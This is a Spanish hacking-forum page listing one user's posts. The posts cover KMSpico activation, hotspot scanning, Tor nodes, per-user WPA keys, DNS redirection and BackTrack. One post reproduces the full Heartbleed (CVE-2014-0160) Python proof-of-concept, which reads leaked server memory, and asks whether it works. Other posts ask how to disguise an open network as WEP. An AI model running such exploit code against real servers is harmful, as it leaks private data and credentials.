elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


  Mostrar Temas
Páginas: [1] 2
1  Sistemas Operativos / Windows / kmspico tiene virus en: 24 Diciembre 2015, 18:13 pm
El caso es que quiero activar windows 10 pero veo en sitios web que tiene virus, yo he testteado varios con virustotal y la verdad que salen bastantes. Realmente es asi o es una artimaña para que no activemos windows de manera ilegal???
Gracias de antemano.
2  Seguridad Informática / Hacking Wireless / no se ven los usuarios conectados en las hotspot en: 30 Mayo 2015, 23:55 pm
Es curioso si te conectas a wifi tipo mcdonals, hoteles y demas, cuando haces un nmap -sP y el ramgo que quieres escanear, no aparece ninguna ip salvo la tuya y la dlel router. Pero lo curioso que antes esto no ocurria, ¿porque ocurre esto alguien sabe como consiguen ocultar el resto de los usuarios que estan conectados.?
3  Seguridad Informática / Bugs y Exploits / script en python para explotar vulnerabilidad openssl en: 9 Abril 2014, 22:36 pm
En security focus esta este exploit, pero no se si es para averiguar si el servidor esta afectado por el bug o es para explotar la vulnerabilidad:

#!/usr/bin/python
 
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford
(jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
 
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
 
options = OptionParser(usage='%prog server [options]', description='Test
for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP
port to test (default: 443)')
 
def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
 
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
 
hb = h2bin('''
18 03 02 00 03
01 40 00
''')
 
def hexdump(s):
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
print
 
def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select(, [], [], 5)
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
 
def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
print 'Unexpected EOF receiving record header - server closed
connection'
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
print 'Unexpected EOF receiving record payload - server closed
connection'
return None, None, None
print ' ... received message: type = %d, ver = %04x, length = %d' %
(typ, ver, len(pay))
return typ, ver, pay
 
def hit_hb(s):
s.send(hb)
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
print 'No heartbeat response received, server likely not vulnerable'
return False
 
if typ == 24:
print 'Received heartbeat response:'
hexdump(pay)
if len(pay) > 3:
print 'WARNING: server returned more data than it should - server is
vulnerable!'
else:
print 'Server processed malformed heartbeat, but did not return any
extra data.'
return True
 
if typ == 21:
print 'Received alert:'
hexdump(pay)
print 'Server returned error, likely not vulnerable'
return False
 
def main():
opts, args = options.parse_args()
if len(args) < 1:
options.print_help()
return
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Connecting...'
sys.stdout.flush()
s.connect((args[0], opts.port))
print 'Sending Client Hello...'
sys.stdout.flush()
s.send(hello)
print 'Waiting for Server Hello...'
sys.stdout.flush()
while True:
typ, ver, pay = recvmsg(s)
if typ == None:
print 'Server closed connection without sending Server Hello.'
return
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
 
print 'Sending heartbeat request...'
sys.stdout.flush()
s.send(hb)
hit_hb(s)
 
if __name__ == '__main__':
main()

¿Alguno lo habeis utilizado?, yo lo he ejecutado pero me da error en el parser, no se si es porque hay que modificar algo en el codigo o porque no le meto parametros y por eso peta el script.
4  Comunicaciones / Redes / crear un nodo tor con ubuntu server en: 8 Marzo 2014, 11:56 am
Me gustaria crear un nodo tor en un pentium III a 600 Mzh con 256 megas de ram y que ejecuta ubuntu server 12.04  El caso que he leido que con vidalia y abriendo los puertos del router, se puede hacer pero vidalia funciona en modo grafico y no veo que se pueda configurar con el bash de linux. ¿hay alguna manera de hacerlo?.
Por otro lado un equipo con tan pocos recursos podria soportar el trafico que viaja a traves de la red tor sin saturarse.
Un saludo.
 
5  Seguridad Informática / Hacking Wireless / red wifi con varias contraseñas wpa2 en: 22 Octubre 2013, 00:27 am
el caso es que en un curro han puesto un router o firewall de la marca fortinet que cuando te conectas a el te pide una clave wpa. En esa oficina hay 10 personas, pues cada una tiene una clave wpa distinta y cuando acceder a la red wifi tienen que meter una clave distinta (cada una la suya). NO es el tipico HOtspot de macdonals o de ayuntamiento donde accedes a una red libre y cuando pones el navegador tienes que aceptar las condiciones de uso o tienes que meter un user o pass en el navegador.
Esto es distinto, cuando selecionas la wifi tienes que meter la clave wpa y se la metes, pero lo curioso es que cada usuario tiene su propia clave wpa.
¿pueden ser estas claves wpa seguir algun tipo de patron, ya que son generadas pro un ordenador, no son claves generadas por un usuario?.
Gracias de antemano.
6  Comunicaciones / Redes / se puede acceder a la red interna de un router que administrar con su ip publica en: 6 Julio 2012, 23:38 pm
Hola, me gustaria saber si se puede tener acceso a la red local de un router que consiguo tener acceso mediante su ip publica y gestionarlo mediante web, pero no puede ser mediante vpn ya que solo tengo acceso a el para su administracion pero no puedo acceder a los equipos que estan conectados a el via wifi ni instalarles ninguna aplicacion a los subsodichos equipos ni logicamente un servidor vpn.
Quizas pueda abrir en forward el puerto netbios en un equipo en concreto y acceder a sus recursos compartidos mediante la ip publica del router.
¿alguna idea, gracias de antemano?
7  Comunicaciones / Redes / mac distintas para una misma ip en: 8 Octubre 2011, 12:40 pm
La verdad que vengo observando que cuando hago un scaneo con nmap me da una direccion ip y una mac pero cuando miro que mac le corresponde a cada ip a traves del firware del router me da otra mac distinta, lo miismo me ocurre escaneando redes con el paquete de utilidades aircrack (creo que es el airodump).
¿porque varia la mac si la ip es la misma?. Es algo que me ha sucedido con varias tarjetas wifi.
Gracias de antemano.
8  Foros Generales / Dudas Generales / hacer que bind siempre te dirija hacia una ip en: 8 Julio 2011, 17:44 pm
El caso que quiero configurar BIND (servidor de DNS), para que cuando se meta una url sea la que sea siempre apunte a una ip, osease configurar un BIND y que aunque el cliente que tenga configurado mi DNS llame a google o yahoo o lo que sea siempre salga mi servidor apache.
¿Alguien sabe como hacerlo?, gracias de antemano.
 
9  Seguridad Informática / Hacking Wireless / hacer pasar una red abierta como wep en: 7 Julio 2011, 13:41 pm
Me gustaria saber si es posible engañar a los sistemas operativos clientes sobre todo a VISTA y 7 que aparece como una admiracion diciendote que la red que te vas a conectar es insegura.
Osease que cree una red abierta wifi pero que aparezca como WEP aunque logicamente esta abierta.
Gracias de antemano.
10  Seguridad Informática / Seguridad / back track 4 ssh y vpn en: 18 Agosto 2010, 14:41 pm
El caso es que he instalado un virtual (con wmware de backtrack4), e intento acceder desde mi portatil al equipo de sobremesa donde esta la virtual de backtrack4, lo hago primero mediante ssh y tras conectarme y aceptar la RSA me pide una contraseña yo le meto por defecto la contraseña de root de backtrack 4 y me dice que no. ¿sabeis cual es la contraseña por defecto, ya que usuario no te pide?, el demonio que utiliza esta distri es el sshd.
Por vnc tambien intento conectar pero tambien me es imposible arranco el servidor de vnc en backtrack 4 que es el xtightvnc y luego en mi portatil meto en un cliente de tightvnc la ip de la virtual y me dice que no se puede conectar.
no tengo ningun problema de conexion con la virtual ya que tiene su propia ip y accedo a ella mediante ping, le he hecho un escaneo de puertos y los puertos estan abiertos tanto el de ssh como el de vnc pero estos son los errores que me dan por un lado el ssh con la password y el vnc que no puede.
Gracias de antemano.
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines